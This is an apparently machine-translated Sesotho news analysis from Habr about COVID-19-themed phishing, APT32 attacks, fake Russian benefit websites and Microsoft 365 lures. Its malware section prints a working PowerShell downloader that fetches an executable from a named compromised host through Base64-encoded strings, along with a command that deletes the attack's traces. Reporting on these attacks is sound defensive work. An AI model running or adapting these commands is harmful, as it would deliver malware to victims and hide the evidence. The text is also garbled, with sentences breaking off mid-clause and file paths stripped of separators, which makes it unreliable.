Bahlaseli ba ntse ba tsoela pele ho sebelisa sehlooho sa COVID-19 hampe, ba theha litšokelo tse ngata ho basebelisi ba nang le thahasello ho tsohle tse amanang le seoa sena. IN
Hopola ho
O ka thabela tlhahlobo ea mahala bakeng sa COVID-19?
Mohlala o mong oa bohlokoa oa phishing-themed coronavirus e bile
Ho kholisa basebelisi ba bangata ho nolofalletsa li-macros le hona ho ne ho le bonolo. Ho etsa sena, ho ile ha sebelisoa leqheka le tloaelehileng: ho tlatsa lethathamo la lipotso, pele u lokela ho nolofalletsa macros, ho bolelang hore u hloka ho tsamaisa script ea VBA.
Joalo ka ha u bona, mongolo oa VBA o patiloe ka ho khetheha ho tsoa ho li-antivirus.
Windows e na le karolo ea ho leta moo sesebelisoa se emelang /T <metsotsoana> pele e amohela karabo ea kamehla ea "E". Tabeng ea rona, script e ile ea ema metsotsoana e 65 pele e hlakola lifaele tsa nakoana:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
'Me ha re ntse re emetse, malware e ile ea kopitsoa. Ho ile ha qalisoa script e khethehileng ea PowerShell bakeng sa sena:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Kamora ho hlakisa boleng ba Base64, mongolo oa PowerShell o khoasolla ntlo e ka morao e fumanehang ho seva sa webo se neng se hapiloe ho tsoa Jeremane:
http://automatischer-staubsauger.com/feature/777777.png
mme e e boloka tlasa lebitso:
C:UsersPublictmpdirfile1.exe
ba foldara ‘C:UsersPublictmpdir’
e hlakolwa ha o tsamaisa faele ya 'tmps1.bat' e nang le taelo cmd /c mkdir ""C:UsersPublictmpdir"".
Tlhaselo e lebisitsoeng ho mekhatlo ea mmuso
Ntle le moo, bahlahlobisisi ba FireEye ba sa tsoa tlaleha tlhaselo e lebisitsoeng ea APT32 e lebisitsoeng ho meaho ea mmuso e Wuhan, hammoho le Lekala la Ts'ebetso ea Tšohanyetso la China. E 'ngoe ea li-RTF tse ajoang e ne e na le sehokelo sa sengoloa sa New York Times se nang le sehlooho se reng
Ho khahlisang, ka nako ea ho sibolloa, ha ho le e 'ngoe ea li-antivirus e ileng ea bona ketsahalo ena, ho latela Virustotal.
Ha liwebsaete tsa semmuso li theohile
Mohlala o tsotehang ka ho fetisisa oa tlhaselo ea phishing e etsahetse Russia ka tsatsi le leng feela. Lebaka la sena e ne e le ho khethoa ha melemo eo e leng khale e letetsoe bakeng sa bana ba lilemo tse 3 ho isa ho tse 16. Ha qalo ea ho amohela likopo e phatlalatsoa ka la 12 Motšeanong, 2020, batho ba limilione ba ile ba potlakela ho webosaete ea Litšebeletso tsa Naha bakeng sa thuso eo e leng khale e letetsoe mme ba theola portal ho feta tlhaselo ea setsebi ea DDoS. Ha mopresidente a re "Litšebeletso tsa 'Muso li sitoa ho sebetsana le phallo ea likopo," batho ba ile ba qala ho bua Inthaneteng ka ho qalisoa ha sebaka se seng sa ho amohela likopo.
Bothata ke hore libaka tse 'maloa li ile tsa qala ho sebetsa hang-hang,' me ha e le 'ngoe, ea sebele ho posobie16.gosuslugi.ru, e hlile e amohela likopo, ho feta
Basebetsi-'moho ho tsoa ho SearchInform ba fumane libaka tse ka bang 30 tsa bomenemene sebakeng sa .ru. Infosecurity le Softline Company li latetse liwebosaete tse tšoanang tsa litšebeletso tsa 'muso tse fetang 70 ho tloha qalong ea Mmesa. Baetsi ba bona ba sebelisa matšoao a tloaelehileng hape ba sebelisa motsoako oa mantsoe gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, joalo-joalo.
Hype le boenjiniere ba sechaba
Mehlala ena kaofela e tiisa feela hore bahlaseli ba atleha ho etsa chelete ka taba ea coronavirus. 'Me ha tsitsipano ea sechaba e ntse e phahama le mathata a sa hlakang, ho na le menyetla e mengata ea scammers ea ho utsoa lintlha tsa bohlokoa, ho qobella batho ho fana ka chelete ea bona ka bobona, kapa ho senya lik'homphieutha tse ngata.
Hape kaha seoa sena se qobelletse batho bao e ka bang ba sa itokisetsa ho sebetsa malapeng ka bongata, eseng feela ea botho, empa le data ea khoebo e kotsing. Mohlala, haufinyane basebelisi ba Microsoft 365 (eo pele e neng e le Office 365) le bona ba ile ba hlaseloa ke phishing. Batho ba ile ba amohela melaetsa ea lentsoe e "fetileng" e mengata e le lihokelo tsa mangolo. Leha ho le joalo, lifaele e ne e hlile e le leqephe la HTML le rometseng bahlaseluoa ba tlhaselo ho
Source: www.habr.com